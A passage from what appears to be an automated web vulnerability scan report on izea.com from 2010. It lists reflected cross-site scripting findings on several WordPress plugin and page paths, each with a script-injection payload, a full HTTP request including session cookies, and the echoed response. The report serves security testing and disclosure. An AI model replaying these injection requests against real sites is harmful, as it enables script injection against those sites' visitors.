The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54b70"><script>alert(1)</script>d8facc3d76c was submitted in the REST URL parameter 1. This input was echoed as 54b70\"><script>alert(1)</script>d8facc3d76c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacy-policy54b70"><script>alert(1)</script>d8facc3d76c/ HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.9.10.1288966493

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:29:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/privacy-policy54b70\"><script>alert(1)</script>d8facc3d76c/"/>
...[SNIP]...

1.12. http://izea.com/privacy-policy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /privacy-policy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05c5"><script>alert(1)</script>c5a7d3aaf97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f05c5\"><script>alert(1)</script>c5a7d3aaf97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacy-policy/?f05c5"><script>alert(1)</script>c5a7d3aaf97=1 HTTP/1.1
Host: izea.com
Proxy-Connection: keep-alive
Referer: http://izea.com/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; sifrFetch=true; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; __utmc=250356574; __utmb=250356574.9.10.1288966493

Response

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 14:28:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://izea.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 33196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/privacy-policy/?f05c5\"><script>alert(1)</script>c5a7d3aaf97=1"/>
...[SNIP]...

1.13. http://izea.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e668a"><script>alert(1)</script>85b279a8694 was submitted in the REST URL parameter 1. This input was echoed as e668a\"><script>alert(1)</script>85b279a8694 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contente668a"><script>alert(1)</script>85b279a8694/plugins/contact-form-7/scripts.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:17:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:17:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-contente668a\"><script>alert(1)</script>85b279a8694/plugins/contact-form-7/scripts.js"/>
...[SNIP]...

1.14. http://izea.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1205a"><script>alert(1)</script>f921e1d9b08 was submitted in the REST URL parameter 2. This input was echoed as 1205a\"><script>alert(1)</script>f921e1d9b08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins1205a"><script>alert(1)</script>f921e1d9b08/contact-form-7/scripts.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:17:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:17:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins1205a\"><script>alert(1)</script>f921e1d9b08/contact-form-7/scripts.js"/>
...[SNIP]...

1.15. http://izea.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a86"><script>alert(1)</script>cd95da19578 was submitted in the REST URL parameter 3. This input was echoed as f4a86\"><script>alert(1)</script>cd95da19578 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-7f4a86"><script>alert(1)</script>cd95da19578/scripts.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:19:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:19:35 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/contact-form-7f4a86\"><script>alert(1)</script>cd95da19578/scripts.js"/>
...[SNIP]...

1.16. http://izea.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3950b"><script>alert(1)</script>bced463c01d was submitted in the REST URL parameter 4. This input was echoed as 3950b\"><script>alert(1)</script>bced463c01d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-7/scripts.js3950b"><script>alert(1)</script>bced463c01d HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:21:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:21:07 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/contact-form-7/scripts.js3950b\"><script>alert(1)</script>bced463c01d"/>
...[SNIP]...

1.17. http://izea.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd084"><script>alert(1)</script>455092df910 was submitted in the REST URL parameter 1. This input was echoed as bd084\"><script>alert(1)</script>455092df910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentbd084"><script>alert(1)</script>455092df910/plugins/contact-form-7/styles.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:17:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:17:11 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-contentbd084\"><script>alert(1)</script>455092df910/plugins/contact-form-7/styles.css"/>
...[SNIP]...

1.18. http://izea.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c46bd"><script>alert(1)</script>d680b8876e0 was submitted in the REST URL parameter 2. This input was echoed as c46bd\"><script>alert(1)</script>d680b8876e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsc46bd"><script>alert(1)</script>d680b8876e0/contact-form-7/styles.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:18:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:18:23 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/pluginsc46bd\"><script>alert(1)</script>d680b8876e0/contact-form-7/styles.css"/>
...[SNIP]...

1.19. http://izea.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7407d"><script>alert(1)</script>60d6a2275a1 was submitted in the REST URL parameter 3. This input was echoed as 7407d\"><script>alert(1)</script>60d6a2275a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-77407d"><script>alert(1)</script>60d6a2275a1/styles.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:20:08 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:20:12 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/contact-form-77407d\"><script>alert(1)</script>60d6a2275a1/styles.css"/>
...[SNIP]...

1.20. http://izea.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30300"><script>alert(1)</script>2b50280f3b2 was submitted in the REST URL parameter 4. This input was echoed as 30300\"><script>alert(1)</script>2b50280f3b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-7/styles.css30300"><script>alert(1)</script>2b50280f3b2 HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:21:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:22:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/contact-form-7/styles.css30300\"><script>alert(1)</script>2b50280f3b2"/>
...[SNIP]...

1.21. http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e79f"><script>alert(1)</script>a8f7921d14d was submitted in the REST URL parameter 1. This input was echoed as 3e79f\"><script>alert(1)</script>a8f7921d14d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content3e79f"><script>alert(1)</script>a8f7921d14d/plugins/nextgen-gallery/css/nggallery.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:17:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:17:21 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content3e79f\"><script>alert(1)</script>a8f7921d14d/plugins/nextgen-gallery/css/nggallery.css"/>
...[SNIP]...

1.22. http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd4f9"><script>alert(1)</script>794dc8ec654 was submitted in the REST URL parameter 2. This input was echoed as cd4f9\"><script>alert(1)</script>794dc8ec654 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginscd4f9"><script>alert(1)</script>794dc8ec654/nextgen-gallery/css/nggallery.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:18:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:18:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/pluginscd4f9\"><script>alert(1)</script>794dc8ec654/nextgen-gallery/css/nggallery.css"/>
...[SNIP]...

1.23. http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dca6"><script>alert(1)</script>7b9c7199439 was submitted in the REST URL parameter 3. This input was echoed as 5dca6\"><script>alert(1)</script>7b9c7199439 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery5dca6"><script>alert(1)</script>7b9c7199439/css/nggallery.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:20:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/nextgen-gallery5dca6\"><script>alert(1)</script>7b9c7199439/css/nggallery.css"/>
...[SNIP]...

1.24. http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e77f6"><script>alert(1)</script>2e58e78c6eb was submitted in the REST URL parameter 4. This input was echoed as e77f6\"><script>alert(1)</script>2e58e78c6eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/csse77f6"><script>alert(1)</script>2e58e78c6eb/nggallery.css HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:22:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:22:43 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/nextgen-gallery/csse77f6\"><script>alert(1)</script>2e58e78c6eb/nggallery.css"/>
...[SNIP]...

1.25. http://izea.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
